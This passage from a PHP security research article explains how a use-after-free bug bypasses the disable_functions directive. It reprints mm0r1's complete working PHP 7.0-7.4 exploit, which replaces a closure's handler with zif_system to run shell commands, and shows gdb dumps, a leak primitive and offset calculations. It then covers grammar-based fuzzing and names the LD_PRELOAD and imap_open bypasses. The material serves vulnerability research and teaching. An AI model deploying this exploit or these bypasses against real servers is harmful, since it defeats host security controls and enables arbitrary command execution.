0x555556616f80: 0x000055555662c04f 0x0000003d0000003d
0x555556616f90: 0x0000000000000000 0x00000001ffffffff
pwndbg> print (zend_string) *0x0000555556616f80
$43 = {
gc = {
refcount = 1449312335,
u = {
v = {
type = 85 'U',
flags = 85 'U',
gc_info = 0
},
type_info = 21845
}
},
h = 261993005117,
len = 8589934591, <--- 0x00000001ffffffff
val = "\377"
}
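
This is the core of the read primitive: since strlen() returns whatever sits in the len field, pointing the fake string 0x10 bytes before a target address returns the 8 bytes stored at that address. The Python sketch below models this over a flat byte buffer. The FakeMemory class, the addresses and the values are all invented for illustration; the only assumption taken from the structure shown earlier is that len sits at offset 0x10 (after the 8-byte gc header and the 8-byte hash).

```python
import struct

ZSTR_LEN_OFFSET = 0x10  # gc (8 bytes) + h (8 bytes) come before len

class FakeMemory:
    """Flat byte buffer standing in for the process address space."""
    def __init__(self, base: int, data: bytes):
        self.base, self.data = base, data

    def read_qword(self, addr: int) -> int:
        return struct.unpack_from("<Q", self.data, addr - self.base)[0]

def strlen_of_fake_string(mem: FakeMemory, str_ptr: int) -> int:
    # What strlen() effectively does: return the len field of the zend_string
    return mem.read_qword(str_ptr + ZSTR_LEN_OFFSET)

def leak(mem: FakeMemory, addr: int, size: int = 8) -> int:
    """Read `size` bytes at `addr` by aiming the fake string at addr - 0x10."""
    value = strlen_of_fake_string(mem, addr - ZSTR_LEN_OFFSET)
    return value if size == 8 else value % (1 << (size * 8))

mem = FakeMemory(0x1000, struct.pack(
    "<3Q", 0xdeadbeefcafebabe, 0x0102030405060708, 0x1122334455667788))

print(hex(leak(mem, 0x1010)))      # full 8-byte read
print(hex(leak(mem, 0x1008, 2)))   # only the two low-order bytes
```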

With this ability to leak arbitrary content, it is possible to repeat the same procedure followed in the previous section in order to identify the zif_system handler. Instead of patching an internal function handler in the function_table, we choose to reuse the anonymous function created ($helper->b()). Anonymous functions or closures have the following structure:

typedef struct _zend_closure {
zend_object std;
zend_function func;
zval this_ptr;
zend_class_entry *called_scope;
zif_handler orig_internal_handler;
} zend_closure;

Within the func field (which is a zend_function), we find a zend_internal_function structure [13]:

typedef struct _zend_internal_function {
/* Common elements */
zend_uchar type;
zend_uchar arg_flags[3]; /* bitset of arg_info.pass_by_reference */
uint32_t fn_flags;
zend_string* function_name;
zend_class_entry *scope;
zend_function *prototype;
uint32_t num_args;
uint32_t required_num_args;
zend_internal_arg_info *arg_info;
/* END of common elements */
zif_handler handler;
struct _zend_module_entry *module;
void *reserved[ZEND_MAX_RESERVED_RESOURCES];
} zend_internal_function;

In gdb, it looks like this:

$3 = {
type = 2 '\002',
arg_flags = "\000\000",
fn_flags = 135266304,
function_name = 0x7ffff3801d70,
scope = 0x0,
prototype = 0x7ffff38652c0,
num_args = 1,
required_num_args = 1,
arg_info = 0x7ffff387c0f0,
handler = 0x7ffff3879068,
module = 0x2,
reserved = {0x7ffff3873280, 0x1, 0x7ffff3879070, 0x0, 0x0, 0x0}
}
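
The offsets needed to tamper with a closure can be derived from these structures. The following Python sketch recomputes them with ctypes, under the assumption of the x86-64 layout of PHP 7.2: pointers are modelled as 64-bit integers, the gc header is flattened into two 32-bit fields, and the padding field and class names are ours. It is a reconstruction for illustration, not code taken from the Zend sources.

```python
import ctypes

U32, U64 = ctypes.c_uint32, ctypes.c_uint64

class ZendObject(ctypes.Structure):
    _fields_ = [
        ("refcount", U32), ("type_info", U32),  # zend_refcounted_h gc
        ("handle", U32), ("_pad", U32),         # explicit alignment padding
        ("ce", U64),
        ("handlers", U64),
        ("properties", U64),
        ("properties_table", U64 * 2),          # first property slot (16-byte zval)
    ]

class ZendInternalFunction(ctypes.Structure):
    _fields_ = [
        ("type", ctypes.c_uint8),
        ("arg_flags", ctypes.c_uint8 * 3),
        ("fn_flags", U32),
        ("function_name", U64),
        ("scope", U64),
        ("prototype", U64),
        ("num_args", U32),
        ("required_num_args", U32),
        ("arg_info", U64),
        ("handler", U64),
    ]

class ZendClosureHead(ctypes.Structure):
    # Only the first two members of zend_closure are needed here
    _fields_ = [("std", ZendObject), ("func", ZendInternalFunction)]

ZSTR_HEADER = 0x18  # gc (8) + h (8) + len (8): val[] starts at this offset

func_type_off = ZendClosureHead.func.offset + ZendInternalFunction.type.offset
handler_off = ZendClosureHead.func.offset + ZendInternalFunction.handler.offset

# Object fields as seen through a string that reuses the same freed chunk
handlers_in_str = ZendObject.handlers.offset - ZSTR_HEADER
first_prop_in_str = ZendObject.properties_table.offset - ZSTR_HEADER

print(hex(func_type_off), hex(handler_off))
print(hex(handlers_in_str), hex(first_prop_in_str))
```

Under these assumptions the function type lands at 0x38 and the handler at 0x68 from the start of the closure, while index 0 of the dangling string overlaps the object's handlers pointer and index 0x10 overlaps its first property. These are the same offsets used in the examples of this section.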

By overwriting the field handler with the one of zif_system (and modifying the field type to 1 to mark it as an internal function and not a user-defined one), the system function would be called. mm0r1’s complete exploit looks like this:

<?php
# PHP 7.0-7.4 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=76047
# debug_backtrace() returns a reference to a variable
# that has been destroyed, causing a UAF vulnerability.
#
# This exploit should work on all PHP 7.0-7.4 versions
# released as of 30/01/2020.
#
# Author: https://github.com/mm0r1
pwn("uname -a");
function pwn($cmd) {
global $abc, $helper, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace(); # ;)
if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
$backtrace = debug_backtrace();
}
}
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for ($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for ($i = 0; $i < $n; $i++) {
$str[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for ($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if ($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
# handle pie
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if ($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
$text_size = $p_memsz;
}
}
if (!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for ($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if ($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'constant' constant check
if ($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if ($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'bin2hex' constant check
if ($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for ($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if ($leak == 0x10102464c457f) { # ELF header
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if ($f_name == 0x6d6574737973) { # system
return leak($addr + 8);
}
$addr += 0x20;
} while ($f_entry != 0);
return false;
}
function trigger_uaf($arg) {
# str_shuffle prevents opcache string interning
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$n_alloc = 10; # increase this value if UAF fails
$contiguous = [];
for ($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle(str_repeat('A', 79));
trigger_uaf('x');
$abc = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) { };
if (strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
# leaks
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
# fake value
write($abc, 0x60, 2);
write($abc, 0x70, 6);
# fake reference
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if (!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if (!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if (!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if (!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
# fake closure object
$fake_obj_offset = 0xd0;
for ($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
# pwn
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4); # internal func type
write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
($helper->b)($cmd);
exit();
}

Scouting for new rivals: finding low-hanging fruit with grammar-aware fuzzing

The previous sections focused on PHP internals and on how to exploit a vulnerability to subvert the effects of the disable_functions directive. This section addresses fuzzing and vulnerability hunting in the Zend engine.

Before diving into the subject, it is worth mentioning that the PHP Bug Tracker[14] holds many reported crashes and other bugs that may be exploitable but go unnoticed. The vulnerability exploited in the previous section is one example: the problem has been known for about 2 years. These situations occur for various reasons:

  • Whoever opens the ticket in the bug tracker does not provide enough information, and/or the code attached is too long or too short, making it difficult to identify the root cause or even verify the reproducibility of the crash.
  • The issue is considered a minor bug rather than a security problem, so its fix is postponed. This follows from the criteria PHP uses to classify bugs[15]: bugs that require arbitrary user-controlled code are not considered security issues. In practice, most of the time this translates to: local vulnerabilities must be reported as regular bugs.
  • The root cause of the bug is difficult to fix and proposed patches do not fix the problem completely.

So it is well worth checking the Bug Tracker for vulnerabilities hidden in plain sight. Checking which engine components are more prone to problems also lets us focus our effort there. Keep in mind, too, that fuzzing commonly rediscovers crashes that other people have already identified and reported.

There are multiple approaches to searching for PHP vulnerabilities by fuzzing, both in terms of where to focus and of which technique to use. Regarding the focus, vulnerabilities in the language parser itself are unlikely, so it is not worth spending time on it. Historically, because of its design, PHP deserialization (unserialize()) has been quite problematic: security flaws keep appearing in it, and exploiting them tends to lead to RCE. Although the use of unserialize() is currently discouraged, various CMSs and other platforms still call it on serialized data that the user controls, such as cookies. There are several articles covering the basics of fuzzing this function [16][17] and of its exploitation [18].

Our goal is to identify vulnerabilities that allow circumventing disable_functions, so any code flow that gives us arbitrary memory read and write primitives is sufficient. In this context, and based on past experience, it is preferable to look for “superficial” or shallow crashes rather than to focus on a specific component (streams, pack/unpack, DOM/XML, etc.); in other words, to maximize results with minimum effort. To this end we follow a fuzzing strategy that generates “grammatically” valid portions of PHP code[19] (i.e. code that does not return a syntax error when executed), without using any feedback to generate new test cases. Other strategies exist, such as performing simple mutations at the AST level using projects like PHP-AST[20], or going further and extending AFL to perform such mutations, as the Superion project does[21].

In this case Domato[22] will be used to generate the test cases. A modified, PHP-oriented version was recently published under the name domatophp[23]. The most interesting thing about this modified version is that it includes dictionaries with rules and function definitions, which saves a lot of time. However, the number of unique crashes identified can be increased considerably with some improvements. For example, its function parameter definitions were extracted by parsing the PHP.NET documentation, a source that is sometimes not completely accurate (e.g. some string parameters are actually paths, some parameters are hidden and undocumented [24], etc.).

To complement the function definitions shipped with domatophp, two strategies are followed: the real parameters are extracted directly from the source code (by parsing the macros), and the error messages are analyzed. This is done using a very simple GDB script[25].

Extracting parameters
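
The idea of reading the real parameters from the parsing macros can be sketched in a few lines of Python. This is only an illustration under stated assumptions, not the tooling used for this article: the names extract_signatures and Z_PARAM_KINDS are hypothetical, the macro-to-type mapping is a small subset, and functions that still use the older zend_parse_parameters() format strings are simply skipped.

```python
import re

# Coarse fuzzing type for a subset of the Z_PARAM_* macros (illustrative mapping).
Z_PARAM_KINDS = {
    "Z_PARAM_STR": "string",
    "Z_PARAM_STRING": "string",
    "Z_PARAM_PATH": "path",
    "Z_PARAM_PATH_STR": "path",
    "Z_PARAM_LONG": "int",
    "Z_PARAM_DOUBLE": "float",
    "Z_PARAM_BOOL": "bool",
    "Z_PARAM_ARRAY": "array",
    "Z_PARAM_ZVAL": "mixed",
    "Z_PARAM_RESOURCE": "resource",
    "Z_PARAM_OBJECT": "object",
}

FUNC_RE = re.compile(r"PHP_FUNCTION\((\w+)\)")
BLOCK_RE = re.compile(
    r"ZEND_PARSE_PARAMETERS_START\((\d+),\s*(\d+)\)(.*?)ZEND_PARSE_PARAMETERS_END",
    re.S,
)
MACRO_RE = re.compile(r"\bZ_PARAM_\w+")


def extract_signatures(source):
    """Return {function name: [(kind, is_optional), ...]} for a C source string."""
    signatures = {}
    funcs = list(FUNC_RE.finditer(source))
    for idx, match in enumerate(funcs):
        # A function body ends where the next PHP_FUNCTION starts.
        end = funcs[idx + 1].start() if idx + 1 < len(funcs) else len(source)
        block = BLOCK_RE.search(source[match.end():end])
        if block is None:
            continue  # no parameter-parsing macro block in this function
        params, optional = [], False
        for macro in MACRO_RE.findall(block.group(3)):
            if macro == "Z_PARAM_OPTIONAL":
                optional = True  # everything after this marker is optional
                continue
            params.append((Z_PARAM_KINDS.get(macro, "unknown"), optional))
        signatures[match.group(1)] = params
    return signatures


# Snippet modeled on the base64_decode() source discussed earlier.
SAMPLE = """
PHP_FUNCTION(base64_decode)
{
    ZEND_PARSE_PARAMETERS_START(1, 2)
        Z_PARAM_STRING(str, str_len)
        Z_PARAM_OPTIONAL
        Z_PARAM_BOOL(strict)
    ZEND_PARSE_PARAMETERS_END();
}
"""

if __name__ == "__main__":
    print(extract_signatures(SAMPLE))
```

The "path" kind is the interesting one here: it marks parameters that the documentation lists as plain strings but that the engine treats as file system paths.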

Domato also allows assigning probabilities to the rules it applies during code generation, which is useful for certain fuzzed parameters. For example, for functions that take file or directory paths it is not very useful to always pass random text strings. These functions usually validate the path first and then its characteristics (whether it is a file or a directory, whether read/write permissions are granted); so by varying the parameter (a path to a read-only file, another to a writable file, directories, etc.) it is possible to reach different states.

<pathfuzz p=0.1> = <stringfuzz>
<pathfuzz p=0.4> = <pathrwfuzz>
<pathfuzz p=0.4> = <pathrofuzz>
<pathfuzz p=0.1> = <pathdirfuzz>
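
To make the effect of these probabilities concrete, the following Python sketch expands the pathfuzz symbol with the same weights. It is not Domato's implementation, only a minimal stand-in for weighted rule selection; the RULES table, the expand helper and the concrete paths used as terminals are assumptions made for the example.

```python
import random
import re

# Each symbol maps to (probability, expansion) alternatives, mirroring the rules above.
# The terminal values are hypothetical placeholders.
RULES = {
    "pathfuzz": [
        (0.1, "<stringfuzz>"),
        (0.4, "<pathrwfuzz>"),
        (0.4, "<pathrofuzz>"),
        (0.1, "<pathdirfuzz>"),
    ],
    "stringfuzz": [(1.0, 'str_repeat("A", 0x100)')],
    "pathrwfuzz": [(1.0, '"/tmp/fuzz_rw.txt"')],
    "pathrofuzz": [(1.0, '"/etc/passwd"')],
    "pathdirfuzz": [(1.0, '"/tmp"')],
}

SYMBOL_RE = re.compile(r"<(\w+)>")


def expand(symbol, rng):
    """Pick one alternative for `symbol` by weight and expand nested symbols."""
    alternatives = RULES[symbol]
    weights = [weight for weight, _ in alternatives]
    bodies = [body for _, body in alternatives]
    chosen = rng.choices(bodies, weights=weights, k=1)[0]
    return SYMBOL_RE.sub(lambda m: expand(m.group(1), rng), chosen)


if __name__ == "__main__":
    rng = random.Random(1234)  # fixed seed so a run can be reproduced
    for _ in range(5):
        print("file_get_contents(" + expand("pathfuzz", rng) + ");")
```

With these weights roughly eight out of ten generated calls receive a real file path, so most executions get past the initial path validation instead of failing early.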

Other improvements are the use of str_shuffle() to deal with cache optimizations, regular calls to var_dump(), a larger number of parameters for functions that accept a variable number of them, etc. To run the test cases, a small C program was written that uses posix_spawn to start the processes in parallel with vfork()[26]. This provides an “acceptable” number of runs per second.

The test cases that generate crashes are simplified and minimized with a small Python script, so that you start with a PHP script of hundreds of lines that looks like this:
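
For readers who only want to reproduce the workflow, the runner can be approximated in Python. Note that this sketch swaps the posix_spawn-based C program for the standard subprocess module and a thread pool, so it will be slower; classify, run_case and run_all are hypothetical names, and "php" is assumed to be in PATH.

```python
import signal
import subprocess
import sys
from concurrent.futures import ThreadPoolExecutor

# Signals that usually indicate memory corruption or an aborted process.
CRASH_SIGNALS = frozenset(
    int(s) for s in (signal.SIGSEGV, signal.SIGABRT, signal.SIGBUS,
                     signal.SIGILL, signal.SIGFPE)
)


def classify(returncode):
    """Map a return code to 'crash', 'ok' or 'error'.

    subprocess reports death by signal N as the return code -N.
    """
    if returncode < 0 and -returncode in CRASH_SIGNALS:
        return "crash"
    return "ok" if returncode == 0 else "error"


def run_case(path, php_binary="php", timeout=10):
    """Run a single test case and return (path, verdict)."""
    try:
        proc = subprocess.run(
            [php_binary, path],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return path, "timeout"
    return path, classify(proc.returncode)


def run_all(paths, workers=8, **kwargs):
    """Run many test cases concurrently and return {path: verdict}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(pool.map(lambda p: run_case(p, **kwargs), paths))


if __name__ == "__main__":
    # Usage: python runner.py case1.php case2.php ...
    for case, verdict in run_all(sys.argv[1:]).items():
        print(verdict, case)
```

Threads are enough here because each worker spends its time waiting on a child process; the timeout keeps a hanging test case from blocking a worker forever.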

...
try { try { simplexml_load_file(str_repeat(chr(160), 65) + str_repeat(chr(243), 257) + str_repeat(chr(211), 65537), str_repeat(chr(47), 65537) + str_repeat(chr(188), 65537), 0, implode(array_map(function($c) {return "\\x" . str_pad(dechex($c), 2, "0");}, range(0, 255))), true); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["SplObjectStorage"]->offsetGet($vars[array_rand($vars)]); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["ReflectionProperty"]->getName(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["SplDoublyLinkedList"]->shift(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["SplFixedArray"]->setSize(1073741823); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["SplFixedArray"]->count(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { mb_http_input(str_repeat("A", 0x100)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["ReflectionProperty"]->setValue(-2147483648); } catch (Exception $e) { } } catch(Error $e) { }
try { try { str_split(implode(array_map(function($c) {return "\\x" . str_pad(dechex($c), 2, "0");}, range(0, 255))), 0); } catch (Exception $e) { } } catch(Error $e) { }
try { try { ctype_upper(str_repeat(chr(149), 257) + str_repeat(chr(208), 17)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["SplFixedArray"]->rewind(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["ReflectionProperty"]->isDefault(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["DOMDocument"]->createComment(str_repeat("A", 0x100)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { strip_tags(str_repeat(chr(162), 4097) + str_repeat(chr(12), 257), str_repeat(chr(47), 1025)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { strrpos(str_repeat("A", 0x100), 2.2250738585072011e-308, -1); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["ReflectionProperty"]->isProtected(); } catch (Exception $e) { } } catch(Error $e) { }
try { try { ctype_alnum("/etc/passwd"); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["DOMElement"]->setAttributeNodeNS(new DOMAttr("attr")); } catch (Exception $e) { } } catch(Error $e) { }
try { try { stream_wrapper_unregister(str_repeat(chr(49), 4097)); } catch (Exception $e) { } } catch(Error $e) { }
try { try { $vars["ReflectionClass"]->hasMethod(str_repeat(chr(230), 4097)); } catch (Exception $e) { } } catch(Error $e) { }
...

And end up with this other one, much easier to understand and debug later:

<?php
// This is a real crash found in the first 10 minutes
$aaa = new SimpleXMLElement("<a>a</a>");
$aaa->xpath(str_repeat(chr(40), 65537));
?>
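
The reduction from hundreds of lines to a couple of statements can be sketched as a greedy chunk-removal loop, a simplified form of delta debugging. This is not the script used for the article: reduce_lines is a hypothetical name, and the oracle below is a stand-in that only checks for two statements, whereas a real one would write the candidate to disk, run it with PHP and report whether the same crash still occurs.

```python
def reduce_lines(lines, still_crashes):
    """Remove chunks of lines while the oracle keeps reporting the crash."""
    if not still_crashes(lines):
        raise ValueError("the initial test case must reproduce the crash")
    chunk = max(len(lines) // 2, 1)
    while chunk >= 1:
        index = 0
        while index < len(lines):
            candidate = lines[:index] + lines[index + chunk:]
            if candidate and still_crashes(candidate):
                lines = candidate   # the chunk was irrelevant, drop it
            else:
                index += chunk      # the chunk is needed, keep it and move on
        chunk //= 2
    return lines


def fake_oracle(lines):
    """Stand-in oracle: 'crashes' when both relevant statements are present."""
    text = "\n".join(lines)
    return "new SimpleXMLElement" in text and "->xpath(" in text


if __name__ == "__main__":
    case = [
        'mb_http_input(str_repeat("A", 0x100));',
        '$aaa = new SimpleXMLElement("<a>a</a>");',
        'ctype_alnum("/etc/passwd");',
        '$vars["SplFixedArray"]->count();',
        '$aaa->xpath(str_repeat(chr(40), 65537));',
        'stream_wrapper_unregister(str_repeat(chr(49), 4097));',
    ]
    for line in reduce_lines(case, fake_oracle):
        print(line)
```

Starting with large chunks discards most of the noise in a few oracle calls, and the final pass with single lines leaves only the statements the crash depends on.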

This reduction and simplification of the test cases allows a first classification by affected component, as well as comparing crashes with each other to rule out duplicates (execution traces are also used for this, such as the call stack, the instruction that caused the segfault, the ASAN output, etc.).
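
One common way to rule out duplicates from the call stack is to hash the names of the top frames and group crashes by that value. The sketch below assumes backtraces in the usual GDB or ASAN text layout; bucket_id is a hypothetical helper and the frame names in the sample traces are invented for the example.

```python
import hashlib
import re

# Matches "#0  0x... in func (...)" (GDB, ASAN) and "#0  func (...)" (GDB).
FRAME_RE = re.compile(r"^\s*#\d+\s+(?:0x[0-9a-fA-F]+\s+in\s+)?(\w+)", re.M)


def bucket_id(trace, depth=3):
    """Hash the function names of the top `depth` frames of a backtrace."""
    frames = FRAME_RE.findall(trace)[:depth]
    return hashlib.sha1("|".join(frames).encode()).hexdigest()[:12]


# Invented traces: the first two differ only in addresses and arguments.
TRACE_A = """
#0  0x0000555555a1b2c3 in parse_expression (ctx=0x7ffff0) at parser.c:120
#1  0x0000555555a1c000 in compile_path (str=0x7fffe0) at parser.c:340
#2  0x0000555555b00000 in zif_example (execute_data=0x7fffd0) at ext.c:55
#3  0x0000555555c00000 in execute_ex (ex=0x7fffc0) at vm.c:900
"""
TRACE_B = """
#0  0x0000555555a1b2c3 in parse_expression (ctx=0x7ffaa0) at parser.c:120
#1  0x0000555555a1c000 in compile_path (str=0x7ffbb0) at parser.c:340
#2  0x0000555555b00000 in zif_example (execute_data=0x7ffcc0) at ext.c:55
#3  0x0000555555c11111 in some_other_caller () at vm.c:10
"""
TRACE_C = """
#0  0x0000555555d00000 in resize_buffer (buf=0x0) at buffer.c:12
#1  0x0000555555d10000 in zif_other (execute_data=0x7fffd0) at ext.c:99
"""

if __name__ == "__main__":
    for name, trace in (("A", TRACE_A), ("B", TRACE_B), ("C", TRACE_C)):
        print(name, bucket_id(trace))
```

A small depth groups aggressively and may merge distinct bugs that share a crashing helper, while a large depth splits one bug into several buckets, so the value is worth tuning against a few manually triaged crashes.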

Considering all parts, the general operation scheme is the following:

Operation scheme

Finally, we only need to analyze the crashes and check which ones are caused by real vulnerabilities rather than by simple bugs.

Playing in other leagues: alternative ways to bypass disable_functions

In addition to vulnerabilities that allow arbitrary memory manipulation, there are other cases in which it is possible to execute system commands despite the restrictions imposed by disable_functions. As seen in previous sections, this directive works by changing the handlers of the disabled functions, so the functions that remain enabled are untouched. Classic vulnerabilities, such as command injection, may be found among those enabled functions and exploited to achieve arbitrary command execution. For example, this happened recently with the function imap_open()[27]. Another case arises whenever putenv() is enabled together with any function that starts an external process (e.g. mail(), which by default executes the sendmail binary). This is the technique used by our tool Chankro[28] to execute arbitrary binaries using LD_PRELOAD[29].

In both cases we find a common pattern where PHP ends up invoking syscalls such as execve to start a new process. Using the domatophp grammar rules, in conjunction with our improvements from the GDB scripts, it is possible to create test cases for each function registered in the Zend engine and check if execve or another interesting syscall is called.

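# funcs.txt holds one generated PHP call per line
while IFS= read -r p; do
    # Build the test case: common template plus the call under test
    cat template.php > alchi/topo.php
    echo "$p" >> alchi/topo.php
    echo "$p" >> log.txt
    # Follow child processes (-f) and keep the exec* syscalls that mention a shell
    strace -f php -r 'eval(file_get_contents("php://stdin"));' < alchi/topo.php 2>&1 | grep exe | grep sh >> log.txt
    rm alchi/topo.php
done < funcs.txt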

In the case of a minimal build, with no extensions at all, only mail() appears as a candidate:

Checking syscalls
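
The grep filter is enough for a quick look, but the strace log can also be post-processed to list exactly which programs were started. The following Python sketch assumes the default strace text format; spawned_programs is a hypothetical helper and the sample log is hand-written to resemble what a call to mail() produces, not captured output.

```python
import re

# Captures the program path and the raw argv list of each execve() call.
EXECVE_RE = re.compile(r'execve\("([^"]+)", \[(.*?)\]')


def spawned_programs(strace_output, ignore=("php",)):
    """Return [(program, argv_text), ...] for execve calls not made to start PHP."""
    found = []
    for match in EXECVE_RE.finditer(strace_output):
        program = match.group(1)
        if program.rsplit("/", 1)[-1] in ignore:
            continue  # skip the initial execve of the interpreter itself
        found.append((program, match.group(2)))
    return found


# Hand-written sample in strace -f format (illustrative only).
SAMPLE = r'''
execve("/usr/local/bin/php", ["php", "test.php"], 0x7ffd5a3c1b10 /* 24 vars */) = 0
[pid  4242] execve("/bin/sh", ["sh", "-c", "/usr/sbin/sendmail -t -i"], 0x55d0c8a7e2f0 /* 24 vars */) = 0
[pid  4243] execve("/usr/sbin/sendmail", ["/usr/sbin/sendmail", "-t", "-i"], 0x55f1b2c3d4e0 /* 24 vars */) = -1 ENOENT (No such file or directory)
'''

if __name__ == "__main__":
    for program, argv in spawned_programs(SAMPLE):
        print(program, "<-", argv)
```

Failed attempts are kept on purpose: an execve that returns ENOENT still shows that the function tries to start an external process, which is what matters for this technique.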

It can be interesting to check all the functions in each new PHP version, as well as to install the extensions that different distros use by default, in order to detect new ways of exploitation.

Conclusions

In this article we have discussed in depth how disable_functions works and shown, by example, how PHP vulnerabilities can be exploited to bypass it. A methodology for identifying new vulnerabilities has also been explained. Both the fuzzing process and the search for alternatives to mail() + putenv() must be run continuously over time, refreshing the target with each new version of PHP. It is also worth using different build options (with special emphasis on extensions) based on the most common distributions.